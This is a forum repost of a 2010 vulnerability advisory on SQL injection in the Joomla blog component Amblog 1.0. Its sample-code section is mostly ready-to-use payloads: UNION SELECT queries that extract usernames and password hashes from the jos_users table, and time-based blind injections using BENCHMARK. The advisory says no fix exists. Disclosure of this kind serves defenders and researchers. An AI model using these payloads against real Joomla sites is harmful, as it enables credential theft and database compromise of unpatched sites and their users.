首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[转帖][推荐]Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities
发表于: 2010-8-11 12:19 2085

[转帖][推荐]Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities

freebsdlin 活跃值
2010-8-11 12:19
2085
Name              Amblog  

Vendor            d89K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0G2j5X3W2@1j5Y4c8Q4x3X3g2Z5N6g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

Versions Affected 1.0  

X. INDEX  

   

 I.    ABOUT THE APPLICATION  

 II.   DESCRIPTION  

 III.  ANALYSIS  

 IV.   SAMPLE CODE  

 V.    FIX  

    

   

I. ABOUT THE APPLICATION  

________________________  

   

Amblog is a simple blog engine for Joomla CMS.  

   

   

II. DESCRIPTION  

_______________  

   

Some parameters are not properly  sanitised before being  

used in SQL queries.  

   

   

III. ANALYSIS  

_____________  

   

Summary:  

   

 A) Multiple SQL Injection  

 B) Multiple Blind SQL Injection  

    

   

A) Multiple SQL Injection  

_________________________  

   

Some  parameters,  such as articleid and catid, are  not  

properly sanitised before being used in SQL queries.This  

can  be exploited to manipulate SQL queries by injecting  

arbitrary SQL code.  

   

   

B) Multiple Blind SQL Injection  

_________________________  

   

The articleid parameter is not properly sanitised before  

being  used  in  SQL  queries.  This can be exploited to  

manipulate SQL queries by injecting arbitrary SQL code.  

   

   

IV. SAMPLE CODE  

_______________  

   

A) Multiple SQL Injection  

   

e75K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6$3K9h3g2%4i4K6y4p5j5h3#2T1L8r3!0Y4i4K6t1$3j5$3q4@1K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT @@version  

   

e78K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5j5i4u0@1K9h3y4D9k6g2)9J5y4X3q4J5N6r3W2U0L8r3g2A6k6q4)9K6c8q4)9J5k6o6p5`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users  

   

07aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5L8X3g2%4k6X3!0J5L8g2)9J5y4X3y4S2N6r3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users  

   

4adK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6r3k6G2M7X3#2Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users  

   

e86K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6r3y4G2L8h3#2W2L8Y4c8X3L8%4u0E0i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users  

   

d0fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5M7$3q4$3k6h3&6W2N6$3y4G2L8h3#2W2L8Y4c8Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users  

   

b75K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5M7$3q4$3k6h3g2V1K9i4c8U0L8$3#2E0k6h3&6@1i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users  

   

   

B) Multiple Blind SQL Injection  

   

b84K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6s2y4S2N6X3g2Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))  

   

c44K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6r3g2D9k6i4c8W2i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))  

   

   

V. FIX  

______  

   

No fix.

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回